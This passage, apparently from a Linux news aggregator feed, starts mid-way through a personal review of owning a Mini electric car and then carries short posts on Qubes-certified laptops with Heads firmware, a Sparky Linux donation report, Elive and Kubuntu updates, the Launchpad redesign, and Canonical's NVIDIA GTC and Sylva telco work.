So I did the nerd thing, and found out who the map supplier was - “Nokia Here” - and submitted a request to fix the data there. Later, I got a map update from BMW which contained my fix. That’s one way to do it.
Within a year of owning the car, it stopped charging at home. The AC charging port just wouldn’t work. I could charge at the fast public DC chargers nearby, but my home charger stopped working.
When I reported the problem to BMW, their assumption was that the wall box on my house was broken. We disproved this by showing a different car charging from the home wall box, and my car refusing to charge from public AC chargers.
The BMW dealership were still very reluctant to accept that there was a problem with the car. I had to drive it to the dealership and put the car on their own slow charger to show them it failing to charge. Only once I’d done that did they allow me to book it in for repair the next day.
In a bit of a dick move, I drove around to empty the battery completely, rocking up to the dealership with the car angrily telling my it had 0% charge. That way they’d have to fix it to charge it to get it back to me. They did indeed fix the problem with the charging system, which took quite a while.
I got a rather fancy BMW i7 on loan while they repaired the car.
When I went to pick the car up, they were very apologetic that it took so long and gave me a bag of Mini merch as a gift. When I went to open the boot to put the bag away, I noticed that there was a panel unclipped and some disconnected wires dangling around in the boot. I had to call someone from the garage over to fix it before I could drive away.
I was a little sad that the car clearly hadn’t been fully checked over before I was given it back.
During cold weather in Winter, the charger plug sometimes gets stuck - frozen - into the socket. This can be quite frustrating as it’s impossible to set off to work while the cable is still attached to the house! I found some plumber grease which I smeared around the plug in the hope of lubricating and reducing the ingress or condensation of water. So far, that’s helped.
I took a wrong turn down a long A-road one night, which meant I didn’t have sufficient charge to get home without stopping to top up. I thought I’d try the internal navigation system, which has a database of charging stations.
The first location it took me to was a hotel. I drove around the car park and couldn’t find a charger at all. Not necessarily the navigation system’s fault, but the hotel signage, to be fair. I gave up, and chose the next nearest charger on the map. It confidently took me down some narrow lanes and stopped at a closed gate which was the entrance to a farm. It looked to me like a private residence.
I gave up and switched to an app on my phone, and ended up at a nearby Tesla charging station where there we many free spaces, and I was able to charge with ease. It possibly should have offered me that one first!
As I mentioned above, there is a Mini app for Android and iOS for managing the car. In it you can do some simple things like lock and unlock the car, turn the lights on, and enable the climate control before setting off. It also has a record of charging sessions, a map for finding chargers, and other useful information like locating the car, and showing battery charge level and estimated range.
It nags you constantly to tell them how great or bad the app is, and inexplicably on a scale of 0 to 10, whether you’d recommend it to friends or colleagues. I cannot fathom the kind of person who recommends apps to friends who do not own the car which the app is for. It’s completely mental.
Every time the dialog comes up - and it’s come up a lot - I rate the app zero, and leave an increasingly irritated message to the developers to stop asking me. I have also filed a ticket with BMW. Their engineers came back to me with details of exactly how often it asks, based on how often you open the app, and the interval between one opening and the next.
You can’t turn this off. It’s super irritating, and I still get asked two years later. I still give it a zero, despite the app having some useful features.
The charge port is covered by a hinged flap, just like in a petrol car. The Mini recently started nagging me that the flap was open when it wasn’t. No amount of opening and closing would stop the car nagging me. Thankfully it still let me drive with a little warning triangle on screen. I let the dealership know, and they fixed it during the upcoming maintenance.
In November my wife was involved in a crash when someone pulled out in front of her from behind traffic. She was only minorly injured, and the car was structurally fine, but a bit smashed up at the front. The other driver was at fault, and it was all sorted out via insurance. The local BMW-approved repair centre had the car from November to January while I had a hire car on loan. The car came back as good as new.
It’s a small car, so there’s no room for a spare wheel. I had a puncture recently and managed to limp the car back home. I pressed the SOS button in the car and got put through to a friendly agent.
They organised a BMW engineer to come out and change the wheel. He arrived very quickly, jumped out of his van and took the wheel off my car, replacing it with a spare he had in the van.
He then put my wheel in the boot of my car and asked me to text him know once I’d got mine fixed, so he could pick his spare up again. I got it fixed within a day or so, and left his spare somewhere safe, as I was out at work. He happily came and collected it. I was pretty pleased with this whole experience.
As I got closer to the two-year anniversary of ownership, the app started to remind me to book the car for a service. There’s a feature in the app to just press a button, and get taken to a page where you can book the car in. The links are all broken and always have been. I don’t have the energy to call BMW to tell them it’s all broken. They should do better QA on the app.
Eventually I just called the garage to get the car maintained. There was a scheduled two-year inspection, a low priority recall, brake check and my broken ‘fuel flap’ to fix. They had the car all day and everything was complete when I picked it up at the end of the day.
The fact that there’s no oil changes, oil filter replacement, spark plug replacments, timing chain/belts, and many other parts that fail on an EV is quite attractive. But there’s still a regular service which needs doing.
Some argue that due to the car having a one-pedal driving mode, where regenerative braking slows tha car down, drivers are less likely to wear out the brakes. However I’ve also seen it asserted that some cars actually use both regenerative braking and the physical disc brakes without letting the driver know. I have no idea whether the Mini actually “smartly” applies the brakes, or if it only does so when I press the brake pedal.
I love the Mini EV. I love driving it, and often make excuses to drive somewhere, or I’ll go the ‘long way round’ in order to spend more time in it. It’s not perfect, but it’s super fun to drive.
As for it being my first EV. While the network of public EV chargers isn’t amazing, there’s enough where I live and travel to service my requirements. I don’t think I’ll go back to a petrol car anytime soon.
We’re also considering replacing the wifes car soon, and will look at electric options for that too.
There’s a new refreshed Mini model out, that the local dealership salespeople seem to want me to test drive. Having seen it on video, but not in person, I’m not convinced I’ll like it. We’ll see.
Last year, we announced that the NovaCustom NV41 Series became a Qubes-certified computer for Qubes OS 4. We noted in the announcement that the NV41 Series came with Dasharo coreboot open-source firmware.
We are now pleased to announce that the NV41 Series is also available with Heads firmware. When you configure your NV41 Series, you can now choose either Dasharo coreboot+EDK-II (default) or Dasharo coreboot+Heads for the firmware. Both options are certified for Qubes OS 4. This makes the NV41 Series the first modern Qubes-certified computer available with Heads!
Current NV41 Series owners who wish to change from Dasharo coreboot+EDK-II to the Heads firmware version can buy the Dasharo Entry Subscription for an easy transition to Heads.
The 2nd monthly Sparky project and donate report of the 2024:
– Linux kernel updated up to 6.7.6, 6.6.18-LTS, 6.1.79-LTS & 5.15.149-LTS
– waterfox-classic-kpe & waterfox-g-kpe have been replaced by waterfox-kde package
– added to repos: mercury-browser, thorium-browser, noi, imaginer
– linux-image-sparky-amd64 meta package replaced linux-image-sparky7-amd64 meta package on Sparky 7 only
– updated sparky-tray so it calls APTus AppCenter instead of old APTus now
– fixed kill yad at sparky-usb-imager, sparky-welcome & sparky-aptus-appcenter – they don’t kill all Yad running apps, only kills it’s own window now
– Sparky 2024.02 & 2024.02 Special Editions of the rolling line released
sparkybackup changes:
– added memtest86+ to live efi boot menu
– added uEFI firmware settup to live efi grub menu
– updated memtest86+ to version 7.0 for live bios mode too
– added Sparky version to the live grub main menu
There is a new channel to send donations via Revolut.
Many thanks to all of you for supporting our open-source projects. Your donations help keeping them and us alive.
Don’t forget to send a small tip in March too, please.
Country
|
Supporter
|
Amount
|
Antoine B.
|
€ 15
|
|
Keith K.
|
$ 10
|
|
Galen T.
|
$ 1.5
|
|
Kaveh
|
$ 11.06
|
|
Olaf T.
|
€ 10
|
|
Grzegorz P.
|
PLN 20
|
|
Krzysztof S.
|
PLN 100
|
|
Rafał Z.
|
PLN 50
|
|
Michał C.
|
PLN 16.78
|
|
Mariusz S.
|
PLN 169.68
|
|
Andrzej P.
|
PLN 20
|
|
Paweł S.
|
PLN 108.21
|
|
Siegmund T.
|
€ 20
|
|
Karl A.
|
€ 1.66
|
|
Rudolf L.
|
€ 10
|
|
Marek B.
|
PLN 10
|
|
Piotr M.
|
PLN 300
|
|
Alexander F.
|
€ 20
|
|
Matt M.
|
€ 8.25
|
|
Stanisław G.
|
PLN 50
|
|
Maciej S.
|
PLN 50
|
|
Detlef O.
|
€ 4
|
|
Wacław T.
|
PLN 50
|
|
Guillermo C.
|
PLN 333.45
|
|
Ryan S.
|
PLN 95.63
|
|
Jorge C.
|
$ 1.50
|
|
Zsolt P.
|
PLN 114.03
|
|
Jorg S.
|
€ 5
|
|
Mateusz G.
|
PLN 25
|
|
Daniel K.
|
PLN 100
|
|
Kamil P.
|
PLN 200
|
|
Jürgen H.
|
€ 20
|
|
Wilfreid N.
|
€ 10
|
|
Tom D.
|
€ 30
|
|
JC A.
|
€ 40
|
|
Fujita K.
|
PLN 26
|
|
Mateusz W.
|
PLN 50
|
|
Bartosz S.
|
PLN 50
|
|
Wojciech H.
|
PLN 1
|
|
Total:
|
67%
|
|
In glance:
|
€ 193.91
PLN 1939.78 $ 24.06 mBTC 0 |
* Keep in mind that some amounts coming to us will be reduced by commissions for online payment services. Only direct sending donations in PLN to our Polish bank account will be credited in full.
* Miej na uwadze, że kwota, którą przekażesz nam poprzez system płatności on-line zostanie pomniejszona o prowizję dla pośrednika. W całości wpłynie tylko ta, która zostanie przesłana bezpośrednio na nasze polskie konto bankowe w PLN.
01 March, 2024 08:48PM by wlad
The Elive Team is pleased to announce the release of 3.8.40 Beta This new version includes: Big Upgrade using the Bookworm base with backports, this version has already been beta tested and improved for 3 months. MacBooks: Much improved support, featuring a very elegant boot selector. RAM: Improved performance and resources usage especially in Live mode. Crontab integration on desktop, which allows your system to enjoy features like automatic updates or hardware watchdogs without needing to re-login on your desktop. BTRFS The filesystem has become more mature and usable, soSEE DETAILS
Check more in the Elive Linux website.
01 March, 2024 05:07PM by Thanatermesis
First I would like to give a big congratulations to KDE for a superb KDE 6 mega release While we couldn’t go with 6 on our upcoming LTS release, I do recommend KDE neon if you want to give it a try! I want to say it again, I firmly stand by the Kubuntu Council in the decision to stay with the rock solid Plasma 5 for the 24.04 LTS release. The timing was just to close to feature freeze and the last time we went with the shiny new stuff on an LTS release, it was a nightmare ( KDE 4 anyone? ). So without further ado, my weekly wrap-up.
Kubuntu:
Continuing efforts from last week Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads. , it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11 as it is a bug fix release and right now it is all about the finding and fixing bugs! Aside from many uploads my accomplishments this week are:
What comes next? Testing, testing, testing! Bug fixes and of course our re-branding. My focus is on bug triage right now. I am also working on new projects in launchpad to easily track our bugs as right now they are all over the place and hard to track down.
Snaps:
I have started the MRs to fix our latest 23.08.5 snaps, I hope to get these finished in the next week or so. I have also been speaking to a prospective student with some GSOC ideas that I really like and will mentor, hopefully we are not too late.
Happy with my work? My continued employment depends on you! Please consider a donation http://kubuntu.org/donate
Thank you!
Launchpad has been around for a while, and its frontpage has remained untouched for a few years now.
If you go into launchpad.net, you’ll notice it looks quite different from what it has looked like for the past 10 years – it has been updated! The goal was to modernize it while trying to keep it looking like Launchpad. The contents have remained the same with only a few text additions, but there were a lot of styling changes.
The most relevant change is that the frontpage now uses Vanilla components (https://vanillaframework.io/docs). This alone, not only made the layout look more modern, but also made it better for a new curious user reaching the page from a mobile device. The accessibility score of the page – calculated with Google’s Lighthouse extension – increased from a 75 to an almost perfect 98!
Given the frontpage is so often the first impression users get when they want to check out Launchpad, we started there. But in the future, we envision the rest of Launchpad looking more modern and having a more intuitive UX.
As a final note, thank you to Peter Makowski for always giving a helping hand with frontend changes in Launchpad.
If you have any feedback for us, don’t forget to reach out in any of our channels. For feature requests you can reach us as feedback@launchpad.net or open a report in https://bugs.launchpad.net/launchpad.
To conclude this post, here is what Launchpad looked like in 2006, yesterday and today.
01 March, 2024 07:19AM by aida
01 March, 2024 02:17AM by aida
As a key technology partner with NVIDIA, Canonical is proud to showcase our joint solutions at NVIDIA GTC again. Join us in person at NVIDIA GTC on March 18-21, 2024 to explore what’s next in AI and accelerated computing. We will be at booth 1601 in the MLOps & LLMOps Pavilion, demonstrating how open source AI solutions can take your models to production, from edge to cloud.
As the world becomes more connected, there is a growing need to extend data processing beyond the data centre to edge devices in the field. As we all know, cloud computing provides numerous resources for AI adoption, processing, storage, and analysis, but it cannot support every use case. Deploying models to edge devices can expand the scope of AI devices by enabling you to process some of the data locally and achieve real-time insights without relying exclusively on the centralised data centre or cloud. This is especially relevant when AI applications would be impractical or impossible to deploy in a centralised cloud or enterprise data centre due to issues related to latency, bandwidth and privacy.
Therefore, a solution that enables scalability, reproducibility, and portability is the ideal choice for a production-grade project. Canonical delivers a comprehensive AI stack with the open source software which your organisation might need for your AI projects from cloud to edge, giving you:
To put our AI stack to the test, during NVIDIA GTC 2024, we will present how our Kubernetes-based AI infrastructure solutions can help create a blueprint for smart cities, leveraging best-in-class NVIDIA hardware capabilities. We will cover both training in the cloud and data centres, and showcase the solution deployed at the edge on Jetson Orin based devices. Please check out the details below and meet our expert on-site.
Abstract:
Artificial intelligence is no longer confined to data centres; it has expanded to operate at the edge. Some models require low latency, necessitating execution close to end-users. This is where edge computing, optimised for AI, becomes essential. In the most popular use cases for modern smart cities, many envision city-wide assistants deployed as “point-of-contact” devices that are available on bus stops, subways, etc. They interact with backend infrastructure to take care of changing conditions while users travel around the city. That creates a need to process local data gathered from infrastructure like internet-of-things gateways, smart cameras, or buses. Thanks to NVIDIA Jetson modules, these data can be processed locally for fast, low-latency AI-driven insights. Then, as device-local computational capabilities are limited, data processing should be offloaded to the edge or backend infrastructure. With the power of Tegra SoC, data can first be aggregated at the edge devices to be later sent to the cloud for further processing. Open-source deployment mechanisms enable such complex setups through automated management, Day 2 operations, and security. Canonical, working alongside NVIDIA, has developed an open-source software infrastructure that simplifies the deployment of multiple Kubernetes clusters at the edge with access to GPU. We’ll go over those mechanisms, and how they orchestrate the deployment of Kubernetes-based AI/machine learning infrastructure across the smart cities blueprint to profit from NVIDIA hardware capabilities, both on devices and cloud instances.
Presenter: Gustavo Sanchez, AI Solutions Architect, Canonical
Starting a deep learning pilot within an enterprise has its set of challenges, but scaling projects to production-grade deployments brings a host of additional difficulties. These chiefly relate to the increased hardware, software, and operational requirements that come with larger and more complex initiatives.
Canonical and NVIDIA offer an integrated end-to-end solution – from a hardware optimised Ubuntu to application orchestration and MLOps. We enable organisations to develop, optimise and scale ML workloads.
Canonical will showcase 3 demos to walk you through our joint solutions with NVIDIA on AI/ML:
Visit our Canonical booth 1601 at GTC to check them out.
If you are interested in building or scaling your AI projects with open source solutions, we are here to help you. Visit ubuntu.com/nvidia to explore our joint data centre offerings.
29 February, 2024 10:53AM by martin (invalid@example.com)
In December 2023, Canonical joined the Sylva project of Linux Foundation Europe to provide fully open-source and upstream telco platform solutions to the project. Sylva aims to tackle the fragmentation in telco cloud technologies and the vendor lock-in caused by proprietary platform solutions, by defining a common validation software framework for telco core and edge clouds. This framework captures the latest set of technical requirements from operators when running telco software workloads as cloud native functions (CNF), such as 5G core microservices and Open RAN software.
Sylva’s mission is to support 5G actors in their efforts to drive convergence of cloud technologies in the telco industry – taking into account interoperability across 5G components, TCO with open source software, compliance with regulations and adherence to high security standards. CNFs from vendor companies can then be operated and validated on reference implementations of the cloud software framework defined by Sylva.
To test and validate telco vendor CNFs, Sylva has deployed cloud-native platforms based on a multi-deployment model as Kubernetes (K8s) clusters on bare metal or OpenStack. These CNFs often require telco-grade enhanced platform features like SR-IOV, DPDK, NUMA, and Hugepages, along with support for a range of container networking interfaces (CNI). In this blog, we explain how Canonical’s Sylva-compliant infrastructure solutions satisfy these requirements.
Canonical’s product portfolio is closely aligned with Sylva’s objectives and strategies. It provides a variety of features that Sylva aims to include in the latest modern telecom infrastructure deployments. The project has already deployed validation platforms running on Ubuntu, and also leverages hardened Ubuntu 22.04 images.
Canonical Kubernetes is a CNCF conformant enterprise-grade Kubernetes with high-availability. It delivers the latest pure upstream Kubernetes, which has been fully tested across a variety of cloud platforms of all form factors, including provisioned bare metal systems, Equinix Metal and OpenStack, and architectures including x86, ARM, IBM POWER and IBM Z. It supports the Cluster API (CAPI), which is mandated by Sylva to provision Kubernetes. With CAPI, an operator can update Kubernetes clusters through rolling upgrades without disruption and initialise their workloads.
For telco edge clouds, Canonical Kubernetes can scale as a lightweight Kubernetes solution with self-healing, high-availability and easy clustering properties. This provides a minimal footprint for more energy-efficient operations at edge clouds. It can equivalently scale up at regional and central clouds where a larger footprint is needed in a data centre.
Based on Canonical Kubernetes, Canonical’s Cloud Native Execution Platform (CNEP) aligns with the Sylva platform features and architectural design. With CNEP, Kubernetes clusters are offered to telco operators on bare metal hardware, where hardware provisioning and cluster operations can both be controlled and orchestrated via Cluster API centrally.
CNEP’s set of supported features makes it ideal for operators who want to adopt a Sylva compliant platform with validated telco CNFs from vendors, e.g. 5G core and Open RAN as well as MEC CNFs, such as content delivery networking (CDN) software. The platform software stack fully supports the Sylva design from bare metal to containers, with capabilities including:
In addition to Canonical Kubernetes and our CNEP solution, Canonical OpenStack supports the advanced platform features that Sylva validation platforms need, including SR-IOV, DPDK, CPU-pinning, NUMA, Hugepages, PCI passthrough, and NVIDIA GPUs with virtualisation. It has native support for both Ceph and Cinder as storage components, both of which are included in the Sylva platform design and roadmap.
Aligned with telco operator needs, Sylva envisions cloud-native telco software execution on Kubernetes platforms. Operators look to deploy Kubernetes clusters at their telco edge, regional and core clouds, providing them with a uniform cloud-native execution environment.
Modern telco infrastructure is distributed, deployed across multiple locations with tens of thousands of far-edge clouds, thousands of near-edge clouds and tens of regional clouds. This calls for deploying and managing a large number of Kubernetes workload clusters at geographically dispersed locations, controlled by management cluster(s) located at regional and central clouds. To tackle this challenge, Sylva has defined a software framework for telecom software platforms based on Kubernetes that are deployed on a large scale.
Modern telco clouds must also support a set of enhanced platform features often required by telco CNFs. Towards this, the project’s validation platforms verify that (i) the deployment platform supports the requirements of a CNF in test, and (ii) the CNF can correctly deploy on the platform and successfully consume these platform features.
Sylva follows a declarative approach with a GitOps framework to manage a high volume of physical nodes and Kubernetes clusters. Infrastructure lifecycle management covers Day 0 (build and deploy), Day 1(run), Day 2(operate) operations, with fault management, updates and upgrades. The project provides automation with CI/CD pipelines where a set of scripts produce and maintain Helm charts that include Kubernetes deployment and operational resource definitions.
A dedicated work group, called Telco Cloud Stack, has developed tooling for cluster deployment and lifecycle management (LCM). This tooling is based on the Flux GitOps tool, which keeps clusters and infrastructure components in sync with their definitions in Git repositories.
To manage the Kubernetes clusters and bare metal provisioning with this tool-chain, Sylva leverages Cluster API (CAPI).
CNFs from different vendors are validated on Sylva platforms for the interoperability between the CNFs and the platforms. The project’s validation program ensures that telco operators who deploy platforms with software components that follow the Sylva reference implementations gain two benefits: (i) verified telco CNF functionality on their cloud platforms, and (ii) verified support for the telco-grade platform features which these CNFs require.
The project has a dedicated work group called the Sylva Validation Center, which tests deployment of vendor CNFs on the project’s validation platforms, where Kubernetes runs on either bare metal hardware or on OpenStack.
The validation of a CNF under test on a Sylva platform starts with identifying the necessary set of platform capabilities that the CNF requires, including CNIs, and then installing and configuring the platform with those capabilities. Once the platform has been configured, a first set of smoke tests are run to verify the platform’s support for this set of features. Once the CNF has been deployed on the platform, some functional tests are performed to verify that the deployment is correctly done, and all the necessary Kubernetes pods are healthy in ready state. Finally, operators may run additional tests on CNFs if deemed necessary.
Canonical’s open source software and solutions meet the platform feature requirements by telco CNFs as tested by the Sylva Validation Center, such as SR-IOV, Multus CNI, and Real-time Linux. Validating telco CNFs on Canonical’s platforms for Sylva will also ensure that our platforms with support for these advanced features are verified by Sylva to run these CNFs.
In its roadmap for 2024, project Sylva is planning to add support for new features in its validation platforms, such as near real-time Linux, immutable operating system for far-edge clouds and GPU offloads. Canonical’s software platforms follow Sylva’s vision and have support for these features already today, with Real-time Ubuntu, Ubuntu Core immutable OS, support for precision time protocol (PTP) and more.
Canonical is committed to making Sylva a benchmark platform for executing telco network functions. This commitment entails Canonical’s contribution to the infrastructure-as-code scripts that compose Sylva, to enable our open source solutions for Sylva, and to align with the evolving technical scope of the project.
Linux Foundation Europe’s Sylva project has defined a platform architecture for validating cloud-native telco network functions on Kubernetes. This provides telco operators with guidance on how to achieve a uniform cloud infrastructure, covering edge, regional and central cloud locations, ultimately aiming at multiple objectives, including cost reduction, interoperability, automation, compliance and security.
The project emphasises the central role of open source platforms with standard and open APIs, which brings a modular approach when designing and deploying telco cloud systems.
Canonical offers fully upstream and telco-grade open source solutions that align with the Sylva platform architecture, including Canonical Kubernetes and Canonical OpenStack. We also engineered an innovative platform solution, CNEP, which is fully inline with the Sylva visions on multi-tenancy, multi-site Kubernetes clusters, bare metal with full automation of hardware provisioning and cluster lifecycle management performed over industry-standard Cluster API.
Canonical provides a full stack for your telecom infrastructure. To learn more about our telco solutions, visit our webpage at ubuntu.com/telco.
Canonical joins the Sylva project
Bringing automation to telco edge clouds at scale
Canonical Kubernetes 1.29 is now generally available
Fast and reliable telco edge clouds with Intel FlexRAN and Real-time Ubuntu for 5G URLLC scenarios